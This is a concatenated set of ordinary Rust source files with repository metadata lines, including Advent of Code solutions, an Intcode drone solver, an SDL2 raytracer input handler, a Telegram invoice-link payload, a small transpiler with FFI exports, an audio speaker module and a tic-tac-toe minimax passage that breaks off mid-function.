//! The Elves are trying to come up with the ultimate hot chocolate recipe;
//! they're even maintaining a scoreboard which tracks the quality score (0-9)
//! of each recipe.
//!
//! Only two recipes are on the board: the first recipe got a score of 3, the
//! second, 7. Each of the two Elves has a current recipe: the first Elf starts
//! with the first recipe, and the second Elf starts with the second recipe.
//!
//! To create new recipes, the two Elves combine their current recipes. This
//! creates new recipes from the digits of the sum of the current recipes'
//! scores. With the current recipes' scores of 3 and 7, their sum is 10, and so
//! two new recipes would be created: the first with score 1 and the second with
//! score 0. If the current recipes' scores were 2 and 3, the sum, 5, would only
//! create one recipe (with a score of 5) with its single digit.
//!
//! The new recipes are added to the end of the scoreboard in the order they are
//! created. So, after the first round, the scoreboard is 3, 7, 1, 0.
//!
//! After all new recipes are added to the scoreboard, each Elf picks a new
//! current recipe. To do this, the Elf steps forward through the scoreboard a
//! number of recipes equal to 1 plus the score of their current recipe. So,
//! after the first round, the first Elf moves forward 1 + 3 = 4 times, while
//! the second Elf moves forward 1 + 7 = 8 times. If they run out of recipes,
//! they loop back around to the beginning. After the first round, both Elves
//! happen to loop around until they land on the same recipe that they had in
//! the beginning; in general, they will move to different recipes.
//!
//! Drawing the first Elf as parentheses and the second Elf as square brackets,
//! they continue this process:
//!
//! ```text
//! (3)[7]
//! (3)[7] 1 0
//! 3 7 1 [0](1) 0
//! 3 7 1 0 [1] 0 (1)
//! (3) 7 1 0 1 0 [1] 2
//! 3 7 1 0 (1) 0 1 2 [4]
//! 3 7 1 [0] 1 0 (1) 2 4 5
//! 3 7 1 0 [1] 0 1 2 (4) 5 1
//! 3 (7) 1 0 1 0 [1] 2 4 5 1 5
//! 3 7 1 0 1 0 1 2 [4](5) 1 5 8
//! 3 (7) 1 0 1 0 1 2 4 5 1 5 8 [9]
//! 3 7 1 0 1 0 1 [2] 4 (5) 1 5 8 9 1 6
//! 3 7 1 0 1 0 1 2 4 5 [1] 5 8 9 1 (6) 7
//! 3 7 1 0 (1) 0 1 2 4 5 1 5 [8] 9 1 6 7 7
//! 3 7 [1] 0 1 0 (1) 2 4 5 1 5 8 9 1 6 7 7 9
//! 3 7 1 0 [1] 0 1 2 (4) 5 1 5 8 9 1 6 7 7 9 2
//! ```
//!
//! The Elves think their skill will improve after making a few recipes (your
//! puzzle input). However, that could take ages; you can speed this up
//! considerably by identifying the scores of the ten recipes after that. For
//! example:
//!
//! * If the Elves think their skill will improve after making 9 recipes, the
//! scores of the ten recipes after the first nine on the scoreboard would be
//! 5158916779 (highlighted in the last line of the diagram).
//! * After 5 recipes, the scores of the next ten would be 0124515891.
//! * After 18 recipes, the scores of the next ten would be 9251071085.
//! * After 2018 recipes, the scores of the next ten would be 5941429882.
//!
//! What are the scores of the ten recipes immediately after the number of
//! recipes in your puzzle input?
//!
//! ## Part 2
//!
//! As it turns out, you got the Elves' plan backwards. They actually want to
//! know how many recipes appear on the scoreboard to the left of the first
//! recipes whose scores are the digits from your puzzle input.
//!
//! * 51589 first appears after 9 recipes.
//! * 01245 first appears after 5 recipes.
//! * 92510 first appears after 18 recipes.
//! * 59414 first appears after 2018 recipes.
//!
//! How many recipes appear on the scoreboard to the left of the score sequence
//! in your puzzle input?
//!
//! [Advent of Code 2018 - Day 14](https://adventofcode.com/2018/day/14)
use std::{
fmt::{self, Display},
iter::FromIterator,
str::FromStr,
};
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct ScoreSeq(Vec<u8>);
impl Display for ScoreSeq {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
let mut formatted = String::with_capacity(21);
formatted.push('[');
for score in &self.0 {
formatted.push(char::from(*score + 0x30));
formatted.push(',');
formatted.push(' ');
}
formatted.pop();
formatted.pop();
formatted.push(']');
f.write_str(&formatted)
}
}
impl From<&[u8]> for ScoreSeq {
fn from(value: &[u8]) -> Self {
ScoreSeq(Vec::from_iter(value.iter().cloned()))
}
}
impl AsRef<[u8]> for ScoreSeq {
fn as_ref(&self) -> &[u8] {
&self.0
}
}
impl FromIterator<u8> for ScoreSeq {
fn from_iter<T: IntoIterator<Item = u8>>(iter: T) -> Self {
ScoreSeq(Vec::from_iter(iter.into_iter()))
}
}
impl FromStr for ScoreSeq {
type Err = String;
fn from_str(s: &str) -> Result<Self, Self::Err> {
let mut digits = Vec::with_capacity(s.len());
for chr in s.chars() {
let digit = chr
.to_digit(10)
.ok_or_else(|| format!("not a number: {}", s))?;
digits.push(digit as u8);
}
Ok(ScoreSeq(digits))
}
}
#[derive(Debug, Clone, PartialEq)]
pub struct Scoreboard(Vec<u8>);
impl Display for Scoreboard {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
let mut formatted = String::with_capacity(self.0.len() * 3);
for score in &self.0 {
formatted.push(char::from(score + 0x30));
formatted.push(' ');
formatted.push(' ');
}
formatted.pop();
formatted.pop();
f.write_str(&formatted)
}
}
impl FromIterator<u8> for Scoreboard {
fn from_iter<T: IntoIterator<Item = u8>>(iter: T) -> Self {
Scoreboard(Vec::from_iter(iter.into_iter()))
}
}
impl Scoreboard {
pub fn new(scores: impl IntoIterator<Item = u8>) -> Self {
Scoreboard(Vec::from_iter(scores.into_iter()))
}
pub fn score_seq(&self, num_recipes: usize, num_scores: usize) -> ScoreSeq {
ScoreSeq::from(&self.0[num_recipes..num_recipes + num_scores])
}
}
#[derive(Debug)]
pub struct Recipes {
sequence: Vec<u8>,
elf1: usize,
elf2: usize,
current: usize,
}
impl Recipes {
pub fn new(recipe1: u8, recipe2: u8) -> Self {
Recipes {
sequence: vec![recipe1, recipe2],
elf1: 0,
elf2: 1,
current: 0,
}
}
}
impl<'a> Iterator for Recipes {
type Item = u8;
fn next(&mut self) -> Option<Self::Item> {
while self.current >= self.sequence.len() {
let sum = self.sequence[self.elf1] + self.sequence[self.elf2];
if sum >= 10 {
self.sequence.push(1);
}
self.sequence.push(sum % 10);
let seq_len = self.sequence.len();
self.elf1 = (self.elf1 + self.sequence[self.elf1] as usize + 1) % seq_len;
self.elf2 = (self.elf2 + self.sequence[self.elf2] as usize + 1) % seq_len;
}
let next = self.sequence[self.current];
self.current += 1;
Some(next)
}
}
#[aoc(day14, part1)]
pub fn score_seq_after_num_recipes(input: &str) -> ScoreSeq {
let num_recipes = input
.trim()
.parse::<usize>()
.unwrap_or_else(|_| panic!("not a valid integer: {:?}", input.trim()));
let num_scores = 10;
let recipes = Recipes::new(3, 7);
let scoreboard = Scoreboard::from_iter(recipes.take(num_recipes + num_scores));
scoreboard.score_seq(num_recipes, num_scores)
}
#[aoc(day14, part2)]
pub fn num_needed_recipes(input: &str) -> usize {
let score_seq = ScoreSeq::from_str(input.trim())
.unwrap_or_else(|_| panic!("not a valid integer: {:?}", input.trim()));
let score_seq_len = score_seq.as_ref().len();
let mut recipes = Recipes::new(3, 7);
loop {
let seq_len = recipes.sequence.len();
if seq_len > score_seq_len {
let offset = seq_len - score_seq_len;
if &recipes.sequence[offset..] == score_seq.as_ref() {
break offset;
}
if &recipes.sequence[offset - 1..seq_len - 1] == score_seq.as_ref() {
break offset - 1;
}
}
recipes.next();
}
}
#[cfg(test)]
mod tests;
| true |
33faa2170dc0c334abd4d9769c1cc8fff67c24dd
|
Rust
|
Vzaa/advent_of_code_2019
|
/day19/src/main.rs
|
UTF-8
| 8,883 | 3.140625 | 3 |
[
"Unlicense"
] |
permissive
|
use std::collections::HashMap;
use std::convert::{TryFrom, TryInto};
type Pos = (i64, i64);
type TileMap = HashMap<Pos, i64>;
#[derive(Debug)]
enum Mode {
Pos,
Im,
Rel,
}
#[derive(Debug)]
enum Intcode {
Add(Mode, Mode, Mode),
Mult(Mode, Mode, Mode),
In(Mode),
Out(Mode),
Jit(Mode, Mode),
Jif(Mode, Mode),
Lt(Mode, Mode, Mode),
Equ(Mode, Mode, Mode),
Adj(Mode),
Halt,
}
#[derive(Debug)]
enum ErrorIntcode {
InvalidOpcode,
InvalidMode,
}
impl TryFrom<i64> for Mode {
type Error = ErrorIntcode;
fn try_from(value: i64) -> Result<Self, Self::Error> {
match value {
0 => Ok(Mode::Pos),
1 => Ok(Mode::Im),
2 => Ok(Mode::Rel),
_ => Err(ErrorIntcode::InvalidMode),
}
}
}
impl TryFrom<i64> for Intcode {
type Error = ErrorIntcode;
fn try_from(value: i64) -> Result<Self, Self::Error> {
let m1: Mode = ((value / 100) % 10).try_into()?;
let m2: Mode = ((value / 1000) % 10).try_into()?;
let m3: Mode = ((value / 10000) % 10).try_into()?;
match value % 100 {
1 => Ok(Intcode::Add(m1, m2, m3)),
2 => Ok(Intcode::Mult(m1, m2, m3)),
3 => Ok(Intcode::In(m1)),
4 => Ok(Intcode::Out(m1)),
5 => Ok(Intcode::Jit(m1, m2)),
6 => Ok(Intcode::Jif(m1, m2)),
7 => Ok(Intcode::Lt(m1, m2, m3)),
8 => Ok(Intcode::Equ(m1, m2, m3)),
9 => Ok(Intcode::Adj(m1)),
99 => Ok(Intcode::Halt),
_ => Err(ErrorIntcode::InvalidOpcode),
}
}
}
fn read_mem() -> Vec<i64> {
let text = std::fs::read_to_string("input").unwrap();
let text = text.trim();
text.split(',').map(|s| s.parse().unwrap()).collect()
}
fn mem_get(mem: &[i64], rel: usize, addr: usize, m: Mode) -> i64 {
match m {
Mode::Pos => mem[mem[addr] as usize],
Mode::Im => mem[addr],
Mode::Rel => mem[(mem[addr] + rel as i64) as usize],
}
}
fn mem_set(mem: &mut [i64], rel: usize, addr: usize, m: Mode, v: i64) {
match m {
Mode::Pos => mem[mem[addr] as usize] = v,
Mode::Im => mem[addr] = v,
Mode::Rel => mem[(mem[addr] + rel as i64) as usize] = v,
}
}
#[derive(Debug, Clone)]
struct Cpu {
mem: Vec<i64>,
pc: usize,
rel: usize,
}
impl Cpu {
fn new() -> Cpu {
let mut mem = read_mem();
// Ugly way to add more memory but whatevz
mem.extend(std::iter::repeat(0).take(1024));
Cpu { mem, pc: 0, rel: 0 }
}
fn run(&mut self, input: &mut Option<i64>) -> Option<i64> {
loop {
let op: Intcode = self.mem[self.pc].try_into().unwrap();
match op {
Intcode::Add(m1, m2, m3) => {
let (p_a, p_b) = (
mem_get(&self.mem, self.rel, self.pc + 1, m1),
mem_get(&self.mem, self.rel, self.pc + 2, m2),
);
mem_set(&mut self.mem, self.rel, self.pc + 3, m3, p_a + p_b);
self.pc += 4;
}
Intcode::Mult(m1, m2, m3) => {
let (p_a, p_b) = (
mem_get(&self.mem, self.rel, self.pc + 1, m1),
mem_get(&self.mem, self.rel, self.pc + 2, m2),
);
mem_set(&mut self.mem, self.rel, self.pc + 3, m3, p_a * p_b);
self.pc += 4;
}
Intcode::In(m1) => {
if input.is_none() {
return None;
}
mem_set(
&mut self.mem,
self.rel,
self.pc + 1,
m1,
input.take().expect("No input"),
);
self.pc += 2;
}
Intcode::Out(m1) => {
let p_a = mem_get(&self.mem, self.rel, self.pc + 1, m1);
//println!("{}", p_a);
self.pc += 2;
return Some(p_a);
}
Intcode::Jit(m1, m2) => {
let (p_a, p_b) = (
mem_get(&self.mem, self.rel, self.pc + 1, m1),
mem_get(&self.mem, self.rel, self.pc + 2, m2),
);
if p_a != 0 {
self.pc = p_b as usize;
} else {
self.pc += 3;
}
}
Intcode::Jif(m1, m2) => {
let (p_a, p_b) = (
mem_get(&self.mem, self.rel, self.pc + 1, m1),
mem_get(&self.mem, self.rel, self.pc + 2, m2),
);
if p_a == 0 {
self.pc = p_b as usize;
} else {
self.pc += 3;
}
}
Intcode::Lt(m1, m2, m3) => {
let (p_a, p_b) = (
mem_get(&self.mem, self.rel, self.pc + 1, m1),
mem_get(&self.mem, self.rel, self.pc + 2, m2),
);
mem_set(&mut self.mem, self.rel, self.pc + 3, m3, (p_a < p_b) as i64);
self.pc += 4;
}
Intcode::Equ(m1, m2, m3) => {
let (p_a, p_b) = (
mem_get(&self.mem, self.rel, self.pc + 1, m1),
mem_get(&self.mem, self.rel, self.pc + 2, m2),
);
mem_set(
&mut self.mem,
self.rel,
self.pc + 3,
m3,
(p_a == p_b) as i64,
);
self.pc += 4;
}
Intcode::Adj(m1) => {
let p_a = mem_get(&self.mem, self.rel, self.pc + 1, m1);
self.rel = (self.rel as i64 + p_a) as usize;
self.pc += 2;
}
Intcode::Halt => {
break;
}
}
}
None
}
}
#[derive(Debug)]
struct Drone {
cpu: Cpu,
}
impl Drone {
fn new() -> Drone {
Drone { cpu: Cpu::new() }
}
fn feed_pos(&mut self, p: Pos) -> Option<i64> {
let mut tmp = Some(p.0);
self.cpu.run(&mut tmp);
tmp = Some(p.1);
self.cpu.run(&mut tmp)
}
}
#[allow(dead_code)]
fn draw_map(tilemap: &HashMap<Pos, i64>) {
let (max_x, max_y) = (
tilemap.keys().map(|p| p.0).max().unwrap(),
tilemap.keys().map(|p| p.1).max().unwrap(),
);
let (min_x, min_y) = (
tilemap.keys().map(|p| p.0).min().unwrap(),
tilemap.keys().map(|p| p.1).min().unwrap(),
);
for y in min_y..=max_y {
print!("{:2}: ", y);
for x in min_x..=max_x {
let t = tilemap.get(&(x, y)).unwrap_or(&0);
let c = match t {
0 => '.',
1 => '#',
_ => panic!("rip"),
};
print!("{}", c);
}
println!();
}
}
fn check_sq(p: Pos, tilemap: &TileMap) -> bool {
for y in p.1..(p.1 + 100) {
for x in p.0..(p.0 + 100) {
if *tilemap.get(&(x, y)).unwrap_or(&0) != 1 {
return false;
}
}
}
true
}
fn check_from_y(tilemap: &TileMap, y_start: i64) -> Option<i64> {
let max_x = tilemap.keys().map(|p| p.0).max().unwrap();
for x in 0..=max_x {
if check_sq((x, y_start), &tilemap) {
return Some(x * 10000 + y_start);
}
}
None
}
fn main() {
let mut tilemap: HashMap<Pos, i64> = HashMap::new();
let mut drone = Drone::new();
// need to reset cpu for some reason
let back = drone.cpu.clone();
let mut sum = 0;
for y in 0..=49 {
for x in 0..=49 {
drone.cpu = back.clone();
let p = (x, y);
let r = drone.feed_pos(p).expect("no resp");
tilemap.insert(p, r);
sum += r;
}
}
println!("Part 1: {}", sum);
for y in 0.. {
let mut detected = false;
for x in 0..y {
drone.cpu = back.clone();
let p = (x, y);
let r = drone.feed_pos(p).expect("no resp");
tilemap.insert(p, r);
if r == 1 {
detected = true;
}
if r == 0 && detected {
break;
}
}
if let Some(p2) = check_from_y(&tilemap, y - 100) {
println!("Part 2: {}", p2);
break;
}
}
}
| true |
01333d959f4ce4d37227b696131b3169e492c3de
|
Rust
|
swerdloj/wgpu-raytracer
|
/src/application.rs
|
UTF-8
| 4,664 | 2.8125 | 3 |
[] |
no_license
|
use sdl2::{
keyboard::{Keycode, KeyboardState, Scancode},
event::{Event, WindowEvent}, mouse::MouseButton,
};
use crate::system::{Message, Runnable, SDL2};
use crate::camera::Camera;
use crate::raytrace::RayTracer;
pub struct ApplicationState {
// Application state
camera: Camera,
relative_mouse_mode: bool,
camera_changed_this_frame: bool,
}
impl ApplicationState {
pub fn new() -> Self {
let camera = Camera::new(0.02);
Self {
camera,
relative_mouse_mode: true,
camera_changed_this_frame: false,
}
}
fn toggle_relative_mouse_mode(&mut self, sdl2: &SDL2) {
self.relative_mouse_mode = !self.relative_mouse_mode;
sdl2.set_relative_mouse_mode(self.relative_mouse_mode);
}
fn set_relative_mouse_mode(&mut self, sdl2: &SDL2, on: bool) {
self.relative_mouse_mode = on;
sdl2.set_relative_mouse_mode(on);
}
}
impl Runnable for ApplicationState {
fn init(&mut self, sdl2: &SDL2) {
// Always begin with relative_mouse_mode on
sdl2.set_relative_mouse_mode(true);
}
fn update(&mut self, sdl2: &SDL2, raytracer: &mut RayTracer, event: &Event) -> Message {
// Dereference the event so values are not behind references
match *event {
Event::KeyDown { keycode: Some(Keycode::Escape), .. } => {
if self.relative_mouse_mode {
// Unfreeze mouse
self.toggle_relative_mouse_mode(sdl2);
// Mouse moves while hidden. Move it to center for convenience.
sdl2.center_mouse_in_window();
} else {
return Message::Quit;
}
Message::ConsumeEvent
}
Event::Window { win_event: WindowEvent::FocusLost, .. } => {
self.set_relative_mouse_mode(sdl2, false);
Message::ConsumeEvent
}
Event::Window { win_event: WindowEvent::FocusGained, .. } => {
self.set_relative_mouse_mode(sdl2, true);
Message::ConsumeEvent
}
Event::MouseButtonDown { mouse_btn: MouseButton::Left, .. } => {
if !self.relative_mouse_mode {
self.toggle_relative_mouse_mode(sdl2);
}
Message::ConsumeEvent
}
Event::MouseMotion { xrel, yrel, .. } => {
if self.relative_mouse_mode {
self.camera.update_angle(xrel as f32, yrel as f32);
self.camera_changed_this_frame = true;
Message::RestartRender
} else {
Message::Nothing
}
}
Event::MouseWheel { y, .. } => {
if self.camera.update_fov(-2.0 * y as f32) {
println!("Vertical FoV: {}", self.camera.v_fov);
self.camera_changed_this_frame = true;
}
Message::RestartRender
}
Event::KeyDown { keycode: Some(Keycode::R), .. } => {
println!("Restarting render");
raytracer.pause_rendering = false;
raytracer.reset_samples();
Message::ConsumeEvent
}
_ => { Message::Nothing }
}
}
fn fixed_update(&mut self, _sdl2: &SDL2, keys: &KeyboardState, raytracer: &mut RayTracer) {
let mut translation = cgmath::Vector3::new(0f32, 0.0, 0.0);
if keys.is_scancode_pressed(Scancode::W) { // Forwards
translation.z -= 0.05;
}
if keys.is_scancode_pressed(Scancode::A) { // Left
translation.x -= 0.02;
}
if keys.is_scancode_pressed(Scancode::S) { // Backwards
translation.z += 0.05;
}
if keys.is_scancode_pressed(Scancode::D) { // Right
translation.x += 0.02;
}
if keys.is_scancode_pressed(Scancode::LShift) { // Up
translation.y += 0.05;
}
if keys.is_scancode_pressed(Scancode::LCtrl) { // Down
translation.y -= 0.05;
}
if translation != cgmath::Vector3::new(0.0, 0.0, 0.0) {
self.camera.update_position(translation.x, translation.y, translation.z);
self.camera_changed_this_frame = true;
raytracer.pause_rendering = false;
}
if self.camera_changed_this_frame {
raytracer.update_camera(&self.camera);
}
self.camera_changed_this_frame = false;
}
}
| true |
ffb602611641af8d32a983c4e1e24c386896aeb3
|
Rust
|
teloxide/teloxide
|
/crates/teloxide-core/src/payloads/create_invoice_link.rs
|
UTF-8
| 3,741 | 2.953125 | 3 |
[
"MIT"
] |
permissive
|
//! Generated by `codegen_payloads`, do not edit by hand.
use serde::Serialize;
use crate::types::LabeledPrice;
impl_payload! {
/// Use this method to create a link for an invoice. Returns the created invoice link as String on success.
#[derive(Debug, PartialEq, Eq, Hash, Clone, Serialize)]
pub CreateInvoiceLink (CreateInvoiceLinkSetters) => String {
required {
/// Product name, 1-32 characters
pub title: String [into],
/// Product description, 1-255 characters
pub description: String [into],
/// Bot-defined invoice payload, 1-128 bytes. This will not be displayed to the user, use for your internal processes.
pub payload: String [into],
/// Payments provider token, obtained via [Botfather]
///
/// [Botfather]: https://t.me/botfather
pub provider_token: String [into],
/// Three-letter ISO 4217 currency code, see more on currencies
pub currency: String [into],
/// Price breakdown, a JSON-serialized list of components (e.g. product price, tax, discount, delivery cost, delivery tax, bonus, etc.)
pub prices: Vec<LabeledPrice> [collect],
}
optional {
/// The maximum accepted amount for tips in the smallest units of the currency (integer, **not** float/double). For example, for a maximum tip of `US$ 1.45` pass `max_tip_amount = 145`. See the exp parameter in [`currencies.json`], it shows the number of digits past the decimal point for each currency (2 for the majority of currencies). Defaults to 0
///
/// [`currencies.json`]: https://core.telegram.org/bots/payments/currencies.json
pub max_tip_amount: u32,
/// A JSON-serialized array of suggested amounts of tips in the smallest units of the currency (integer, **not** float/double). At most 4 suggested tip amounts can be specified. The suggested tip amounts must be positive, passed in a strictly increased order and must not exceed _max_tip_amount_.
pub suggested_tip_amounts: Vec<u32> [collect],
/// A JSON-serialized data about the invoice, which will be shared with the payment provider. A detailed description of required fields should be provided by the payment provider.
pub provider_data: String [into],
/// URL of the product photo for the invoice. Can be a photo of the goods or a marketing image for a service. People like it better when they see what they are paying for.
pub photo_url: String [into],
/// Photo size in bytes
pub photo_size: String [into],
/// Photo width
pub photo_width: String [into],
/// Photo height
pub photo_height: String [into],
/// Pass _True_, if you require the user's full name to complete the order
pub need_name: bool,
/// Pass _True_, if you require the user's phone number to complete the order
pub need_phone_number: bool,
/// Pass _True_, if you require the user's email address to complete the order
pub need_email: bool,
/// Pass _True_, if you require the user's shipping address to complete the order
pub need_shipping_address: bool,
/// Pass _True_, if user's phone number should be sent to provider
pub send_phone_number_to_provider: bool,
/// Pass _True_, if user's email address should be sent to provider
pub send_email_to_provider: bool,
/// Pass _True_, if the final price depends on the shipping method
pub is_flexible: bool,
}
}
}
| true |
6c01f3dc6092b4ded51df198d0544b19576e8d2c
|
Rust
|
yysofiyan/naskah
|
/src/lib.rs
|
UTF-8
| 1,426 | 2.71875 | 3 |
[
"MIT"
] |
permissive
|
#[macro_use]
extern crate nom;
extern crate regex;
mod ast;
mod parser;
mod printer;
use parser::parse;
use printer::js::print;
use std::ffi::CString;
use std::mem;
use std::os::raw::{c_char, c_void};
fn transpile_to_js(s: String) -> String {
let naskah_ast = parse(&s);
match naskah_ast {
Ok(ast) => print(ast),
Err(_) => String::from("salah sintaks"),
}
}
#[no_mangle]
pub extern "C" fn alloc(size: usize) -> *mut c_void {
let mut buf = Vec::with_capacity(size);
let ptr = buf.as_mut_ptr();
mem::forget(buf);
return ptr as *mut c_void;
}
#[no_mangle]
pub extern "C" fn dealloc_str(ptr: *mut c_char) {
unsafe {
let _ = CString::from_raw(ptr);
}
}
#[no_mangle]
pub extern "C" fn transpile(ptr: *mut c_char) -> *mut c_char {
let input: String;
unsafe {
input = CString::from_raw(ptr).into_string().unwrap();
}
let script = transpile_to_js(input);
let c_script = CString::new(script).unwrap();
c_script.into_raw()
}
#[cfg(test)]
mod test {
use super::*;
#[test]
fn ext_single() {
let js = transpile_to_js(String::from("misal x = null;\n"));
assert_eq!(js, String::from("var x = null;\n"));
}
#[test]
fn ext_multi() {
let js = transpile_to_js(String::from("misal x = null;\nmisal y = benar;\n"));
assert_eq!(js, String::from("var x = null;\nvar y = true;\n"));
}
}
| true |
0f4c26ab62e2e7308d3ac44a5bb5f9b0ba48ff1e
|
Rust
|
Arsalankhan1982/Rust_variableprogram
|
/variables/src/main.rs
|
UTF-8
| 225 | 3.21875 | 3 |
[] |
no_license
|
/*fn main() {
let mut x = 5;
println!("The Value of x is : {}",x);
x = 6;
println!("The Value of x is : {}",x);
}*/
fn main() {
for number in (1..4).rev() {
println!("{}!", number);
}
println!("LIFTOFF!!!");
}
| true |
30726ce2bd56f91bf6fe34980e2b1b6b3aa97d53
|
Rust
|
iCodeIN/advent-of-code-3
|
/crates/core/src/year2015/day15.rs
|
UTF-8
| 3,472 | 3.34375 | 3 |
[
"MIT"
] |
permissive
|
use crate::Input;
struct Ingredient {
capacity: i32,
durability: i32,
flavour: i32,
texture: i32,
calories: i32,
}
fn score_recipe(ingredients: &[Ingredient], teaspoons: &[i32], part2: bool) -> i32 {
if teaspoons.iter().sum::<i32>() != 100 {
return 0;
}
let mut capacity = 0;
let mut durability = 0;
let mut flavour = 0;
let mut texture = 0;
let mut calories = 0;
for i in 0..ingredients.len() {
capacity += ingredients[i].capacity * teaspoons[i];
durability += ingredients[i].durability * teaspoons[i];
flavour += ingredients[i].flavour * teaspoons[i];
texture += ingredients[i].texture * teaspoons[i];
calories += ingredients[i].calories * teaspoons[i];
}
if capacity <= 0 || durability <= 0 || flavour <= 0 || texture <= 0 {
// "If any properties had produced a negative total, it would have
// instead become zero, causing the whole score to multiply to zero."
return 0;
}
if part2 && calories != 500 {
return 0;
}
capacity * durability * flavour * texture
}
fn highest_score(
ingredients: &[Ingredient],
teaspoons: &mut [i32],
index: usize,
part2: bool,
) -> i32 {
if index == teaspoons.len() {
return score_recipe(ingredients, teaspoons, part2);
}
let spoons_used_so_far = teaspoons.iter().take(index).sum::<i32>();
let mut max_score = 0;
for i in 0..=(100 - spoons_used_so_far) {
teaspoons[index] = i;
let score = highest_score(ingredients, teaspoons, index + 1, part2);
max_score = std::cmp::max(max_score, score);
}
max_score
}
pub fn solve(input: &mut Input) -> Result<i32, String> {
let error_mapper = |_| "Invalid number";
let mut ingredients = Vec::new();
for line in input.text.lines() {
let words = line.split(' ').collect::<Vec<_>>();
if words.len() != 11 || words.iter().any(|s| s.is_empty()) {
return Err("Invalid line not consisting of 11 words".to_string());
}
let capacity = words[2][0..words[2].len() - 1]
.parse::<i32>()
.map_err(error_mapper)?;
let durability = words[4][0..words[4].len() - 1]
.parse::<i32>()
.map_err(error_mapper)?;
let flavour = words[6][0..words[6].len() - 1]
.parse::<i32>()
.map_err(error_mapper)?;
let texture = words[8][0..words[8].len() - 1]
.parse::<i32>()
.map_err(error_mapper)?;
let calories = words[10].parse::<i32>().map_err(error_mapper)?;
let ingredient = Ingredient {
capacity,
durability,
flavour,
texture,
calories,
};
ingredients.push(ingredient);
}
let mut teaspoons = vec![0; ingredients.len()];
Ok(highest_score(
&ingredients,
&mut teaspoons,
0,
input.is_part_two(),
))
}
#[test]
pub fn tests() {
use crate::{test_part_one, test_part_two};
let example = "Butterscotch: capacity -1, durability -2, flavor 6, texture 3, calories 8
Cinnamon: capacity 2, durability 3, flavor -2, texture -1, calories 3";
test_part_one!(example => 62_842_880);
test_part_two!(example => 57_600_000);
let real_input = include_str!("day15_input.txt");
test_part_one!(real_input => 18_965_440);
test_part_two!(real_input => 15_862_900);
}
| true |
de0798313764a7fdeda19c4b8347c2223def1adb
|
Rust
|
chatblanc-ciel/openrr
|
/arci-speak-audio/src/lib.rs
|
UTF-8
| 1,762 | 2.953125 | 3 |
[
"Apache-2.0"
] |
permissive
|
use arci::Speaker;
use std::{collections::HashMap, fs::File, io, path::Path, path::PathBuf};
use tracing::error;
use thiserror::Error;
#[derive(Error, Debug)]
#[non_exhaustive]
pub enum Error {
#[error("io: {:?}", .0)]
Io(#[from] std::io::Error),
#[error("rodio: {:?}", .0)]
Decoder(#[from] rodio::decoder::DecoderError),
#[error("rodio: {:?}", .0)]
Stream(#[from] rodio::StreamError),
#[error("rodio: {:?}", .0)]
Play(#[from] rodio::PlayError),
#[error("not found: {:?}", .0)]
HashNotFound(String),
}
pub struct AudioSpeaker {
message_to_file_path: HashMap<String, PathBuf>,
}
impl AudioSpeaker {
/// Creates a new `AudioSpeaker`.
pub fn new(hashmap: HashMap<String, PathBuf>) -> Self {
Self {
message_to_file_path: hashmap,
}
}
/// Similar to `Speaker::speak`, but returns an error when the command failed.
pub fn try_speak(&self, message: &str) -> Result<(), Error> {
match self.message_to_file_path.get(message) {
Some(path) => play_audio_file(path),
None => Err(Error::HashNotFound(message.to_string())),
}
}
}
impl Speaker for AudioSpeaker {
fn speak(&self, message: &str) {
if let Err(e) = self.try_speak(message) {
// TODO: Speaker trait seems to assume that speak method will always succeed.
error!("{}", e);
}
}
}
fn play_audio_file(path: &Path) -> Result<(), Error> {
let (_stream, stream_handle) = rodio::OutputStream::try_default()?;
let sink = rodio::Sink::try_new(&stream_handle)?;
let file = File::open(path)?;
let source = rodio::Decoder::new(io::BufReader::new(file))?;
sink.append(source);
sink.sleep_until_end();
Ok(())
}
| true |
0b2ba9e41144f73819463d5e397a3c5ae3f23801
|
Rust
|
kakikikki/rust_exercises
|
/fibonacci/src/main.rs
|
UTF-8
| 1,255 | 3.375 | 3 |
[
"MIT"
] |
permissive
|
use std::time::{Instant};
fn main() {
for number in (0..51).step_by(10) {
// Test simple rec
let start = Instant::now();
let result = fibonacci(number);
let duration = start.elapsed();
println!("Simple recursion: N: {:<3} Result: {} Time: {:?}", number, result, duration);
// Test fast_fib <3 shadowing
let start = Instant::now();
let result = fast_fib(number);
let duration = start.elapsed();
println!("Fast doubling: N: {:<3} Result: {} Time: {:?}", number, result, duration);
}
}
// Naive approach
fn fibonacci(n: isize) -> isize {
if n < 2 {
return n;
}
else {
return fibonacci(n-1) + fibonacci(n-2);
}
}
// Fast doubling Rust port
// original algorithm written in python by
// https://www.nayuki.io/page/fast-fibonacci-algorithms
fn fast_fib(n: isize) -> isize {
return _fast_fib(n).0;
}
fn _fast_fib(n: isize) -> (isize, isize) {
if n == 0 {
return (0, 1);
}
else {
let (a, b) = _fast_fib(n / 2);
let c = a * (b * 2 -a);
let d = a * a + b * b;
if n % 2 == 0 {
return (c, d);
}
else {
return (d, c + d);
}
}
}
| true |
4f245f612a126be7471e919347c1d0f16106655a
|
Rust
|
meirce/TicTacToe
|
/src/tictactoe/minmax.rs
|
UTF-8
| 2,142 | 3.3125 | 3 |
[] |
no_license
|
use failure::{err_msg, Error};
use std::collections::HashMap;
use super::board::Board;
#[derive(Clone, Copy)]
struct MoveValue {
cell: usize,
value: i8,
}
pub struct Minmax {
memory: HashMap<Board, MoveValue>
}
impl Minmax {
pub fn new() -> Self {
Minmax {memory: HashMap::new()}
}
pub fn get_next_move(&mut self, board: &Board, player_value: &i8) -> Result<usize, Error> {
Ok(self.minmax(&board, *player_value)?.cell)
}
fn minmax(&mut self, board: &Board, turn: i8) -> Result<MoveValue, Error> {
if self.memory.contains_key(board) {
match self.memory.get(board) {
Some(x) => {
return Ok(*x);
},
_ => {}
}
}
let free_moves: Vec<usize> = board
.data
.iter()
.enumerate()
.filter(|(_, val)| **val == 0)
.map(|(i, _)| i)
.collect();
let value = Minmax::eval_board(&board, 9 - free_moves.len() as i8);
if value != 0 {
return Ok(MoveValue { cell: 10, value });
}
if free_moves.is_empty() {
return Ok(MoveValue { cell: 10, value: 0 });
}
let mut next_boards: HashMap<usize, MoveValue> = HashMap::new();
for next_move in free_moves {
let mut new_board = board.clone();
new_board.data[next_move] = turn;
next_boards.insert(
next_move,
MoveValue {
cell: next_move,
value: self.minmax(&new_board, -turn)?.value,
},
);
}
let best_move = *next_boards
.iter()
.max_by_key(|(_, j)| turn * j.value)
.ok_or_else(|| err_msg("Could not find min/max valued move."))?.1;
